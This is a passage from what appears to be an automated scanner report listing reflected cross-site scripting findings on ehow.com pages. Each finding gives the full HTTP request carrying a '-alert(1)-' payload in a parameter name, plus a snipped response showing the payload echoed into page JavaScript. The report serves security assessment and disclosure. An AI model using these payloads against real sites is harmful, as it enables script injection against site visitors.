This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /how_4474239_make-graph-using-excel.html?4f436'-alert(1)-'4415fbcb8c=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:50 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 94577

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>How to Make a Graph Using Excel | eHow.com</title
...[SNIP]...
<script language="javascript" type="text/javascript">
try { var OriginalURL = '/how_4474239_make-graph-using-excel.html?4f436'-alert(1)-'4415fbcb8c=1'; }
catch (e) { OriginalURL = ''; }
try {
if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) {
window.OriginalURL = '/how_4474239_make-graph-using-
...[SNIP]...

4.380. http://www.ehow.com/how_4924781_open-pub-file-mac.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_4924781_open-pub-file-mac.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8f4c'-alert(1)-'1c3432371cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /how_4924781_open-pub-file-mac.html?b8f4c'-alert(1)-'1c3432371cf=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:04 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73508

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>How to Open a Pub File on a Mac | eHow.com</title
...[SNIP]...
<script language="javascript" type="text/javascript">
try { var OriginalURL = '/how_4924781_open-pub-file-mac.html?b8f4c'-alert(1)-'1c3432371cf=1'; }
catch (e) { OriginalURL = ''; }
try {
if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) {
window.OriginalURL = '/how_4924781_open-pub-file-mac
...[SNIP]...

4.381. http://www.ehow.com/how_5073161_convert-wps-file-extension.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_5073161_convert-wps-file-extension.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa220'-alert(1)-'daadd8a210 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /how_5073161_convert-wps-file-extension.html?fa220'-alert(1)-'daadd8a210=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:04 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75425

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>How to Convert a WPS File Extension | eHow.com</t
...[SNIP]...
<script language="javascript" type="text/javascript">
try { var OriginalURL = '/how_5073161_convert-wps-file-extension.html?fa220'-alert(1)-'daadd8a210=1'; }
catch (e) { OriginalURL = ''; }
try {
if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) {
window.OriginalURL = '/how_5073161_convert-wps-file-
...[SNIP]...

4.382. http://www.ehow.com/how_5215115_change-startup-programs-windows-7.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_5215115_change-startup-programs-windows-7.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3fab0'-alert(1)-'239e708e54d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /how_5215115_change-startup-programs-windows-7.html?3fab0'-alert(1)-'239e708e54d=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:46 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 82368

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>How to Change Startup Programs in Windows 7 | eHo
...[SNIP]...
<script language="javascript" type="text/javascript">
try { var OriginalURL = '/how_5215115_change-startup-programs-windows-7.html?3fab0'-alert(1)-'239e708e54d=1'; }
catch (e) { OriginalURL = ''; }
try {
if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) {
window.OriginalURL = '/how_5215115_change-startup-pr
...[SNIP]...

4.383. http://www.ehow.com/how_5381925_make-roof-rake.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_5381925_make-roof-rake.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c848'-alert(1)-'b133b6ee46a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /how_5381925_make-roof-rake.html?2c848'-alert(1)-'b133b6ee46a=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:26 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 74849

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>How to Make a Roof Rake | eHow.com</title>
<me
...[SNIP]...
<script language="javascript" type="text/javascript">
try { var OriginalURL = '/how_5381925_make-roof-rake.html?2c848'-alert(1)-'b133b6ee46a=1'; }
catch (e) { OriginalURL = ''; }
try {
if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) {
window.OriginalURL = '/how_5381925_make-roof-rake.ht
...[SNIP]...

4.384. http://www.ehow.com/how_5521182_avoid-seasonal-affective-disorder-sad.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_5521182_avoid-seasonal-affective-disorder-sad.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64ee4'-alert(1)-'f456c4201c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /how_5521182_avoid-seasonal-affective-disorder-sad.html?64ee4'-alert(1)-'f456c4201c4=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:12 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 87639

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>How to Avoid SAD | eHow.com</title>
<meta char
...[SNIP]...
<script language="javascript" type="text/javascript">
try { var OriginalURL = '/how_5521182_avoid-seasonal-affective-disorder-sad.html?64ee4'-alert(1)-'f456c4201c4=1'; }
catch (e) { OriginalURL = ''; }
try {
if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) {
window.OriginalURL = '/how_5521182_avoid-seasonal-af
...[SNIP]...

4.385. http://www.ehow.com/how_5809012_create-indoor-gardens.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_5809012_create-indoor-gardens.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f6ce'-alert(1)-'4ee6a37a499 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /how_5809012_create-indoor-gardens.html?7f6ce'-alert(1)-'4ee6a37a499=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:12 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 78342

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>How to Create Indoor Gardens | eHow.com</title>

...[SNIP]...
<script language="javascript" type="text/javascript">
try { var OriginalURL = '/how_5809012_create-indoor-gardens.html?7f6ce'-alert(1)-'4ee6a37a499=1'; }
catch (e) { OriginalURL = ''; }
try {
if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) {
window.OriginalURL = '/how_5809012_create-indoor-gar
...[SNIP]...

4.386. http://www.ehow.com/how_6469141_improve-english-grammar-skills.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_6469141_improve-english-grammar-skills.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de2cc'-alert(1)-'9bd54b7ec50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /how_6469141_improve-english-grammar-skills.html?de2cc'-alert(1)-'9bd54b7ec50=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:10 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 76525

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>How to Improve English Grammar Skills | eHow.com<
...[SNIP]...
<script language="javascript" type="text/javascript">
try { var OriginalURL = '/how_6469141_improve-english-grammar-skills.html?de2cc'-alert(1)-'9bd54b7ec50=1'; }
catch (e) { OriginalURL = ''; }
try {
if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) {
window.OriginalURL = '/how_6469141_improve-english-g
...[SNIP]...

4.387. http://www.ehow.com/how_7496527_resolve-5-common-grammar-problems.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_7496527_resolve-5-common-grammar-problems.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ccc4'-alert(1)-'eff1c631b84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /how_7496527_resolve-5-common-grammar-problems.html?6ccc4'-alert(1)-'eff1c631b84=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:50 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 83128

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>How to Resolve 5 Common Grammar Problems | eHow.c
...[SNIP]...
<script language="javascript" type="text/javascript">
try { var OriginalURL = '/how_7496527_resolve-5-common-grammar-problems.html?6ccc4'-alert(1)-'eff1c631b84=1'; }
catch (e) { OriginalURL = ''; }
try {
if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) {
window.OriginalURL = '/how_7496527_resolve-5-common-
...[SNIP]...

4.388. http://www.ehow.com/how_7744253_attach-mini-shades-update-chandelier.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_7744253_attach-mini-shades-update-chandelier.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41305'-alert(1)-'0c6f72547ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /how_7744253_attach-mini-shades-update-chandelier.html?41305'-alert(1)-'0c6f72547ad=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:09 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73984

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>How to Attach Mini Shades to Update a Chandelier
...[SNIP]...
<script language="javascript" type="text/javascript">
try { var OriginalURL = '/how_7744253_attach-mini-shades-update-chandelier.html?41305'-alert(1)-'0c6f72547ad=1'; }
catch (e) { OriginalURL = ''; }
try {
if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) {
window.OriginalURL = '/how_7744253_attach-mini-shade
...[SNIP]...

4.389. http://www.ehow.com/how_7856914_prevent-chimney-fires.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_7856914_prevent-chimney-fires.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbf8e'-alert(1)-'76a29eab4ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /how_7856914_prevent-chimney-fires.html?fbf8e'-alert(1)-'76a29eab4ee=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:41 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72453

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>How to Prevent Chimney Fires | eHow.com</title>

...[SNIP]...
<script language="javascript" type="text/javascript">
try { var OriginalURL = '/how_7856914_prevent-chimney-fires.html?fbf8e'-alert(1)-'76a29eab4ee=1'; }
catch (e) { OriginalURL = ''; }
try {
if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) {
window.OriginalURL = '/how_7856914_prevent-chimney-f
...[SNIP]...

4.390. http://www.ehow.com/how_9191_program-rca-universal.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_9191_program-rca-universal.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a74c'-alert(1)-'8d434bae862 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /how_9191_program-rca-universal.html?9a74c'-alert(1)-'8d434bae862=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:04 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 83715

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>How to Program an RCA Universal Remote Control |
...[SNIP]...
<script language="javascript" type="text/javascript">
try { var OriginalURL = '/how_9191_program-rca-universal.html?9a74c'-alert(1)-'8d434bae862=1'; }
catch (e) { OriginalURL = ''; }
try {
if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) {
window.OriginalURL = '/how_9191_program-rca-universa
...[SNIP]...

4.391. http://www.ehow.com/internet/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/internet/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d46d'-alert(1)-'33313014650 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /internet/?7d46d'-alert(1)-'33313014650=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

4.392. http://www.ehow.com/job-search-and-employment/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/job-search-and-employment/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e424'-alert(1)-'d58b620fb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /job-search-and-employment/?4e424'-alert(1)-'d58b620fb9=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

4.393. http://www.ehow.com/lawn-and-garden/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/lawn-and-garden/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9de4d'-alert(1)-'a2435ec230d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /lawn-and-garden/?9de4d'-alert(1)-'a2435ec230d=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:28 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 67905

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Lawn & Garden - How To Information | eHow.com</ti
...[SNIP]...
<fb:like href="http://www.ehow.com/lawn-and-garden/?9de4d'-alert(1)-'a2435ec230d=1" ref="like" width="300">
...[SNIP]...

4.394. http://www.ehow.com/legal/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/legal/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c967'-alert(1)-'f0d7f914f94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /legal/?7c967'-alert(1)-'f0d7f914f94=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:45 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73302

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Legal - How To Information | eHow.com</title>

...[SNIP]...
<fb:like href="http://www.ehow.com/legal/?7c967'-alert(1)-'f0d7f914f94=1" ref="like" width="300">
...[SNIP]...

4.395. http://www.ehow.com/list_6515049_common-english-grammar-mistakes.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/list_6515049_common-english-grammar-mistakes.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10d4f'-alert(1)-'1fbf08c4b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

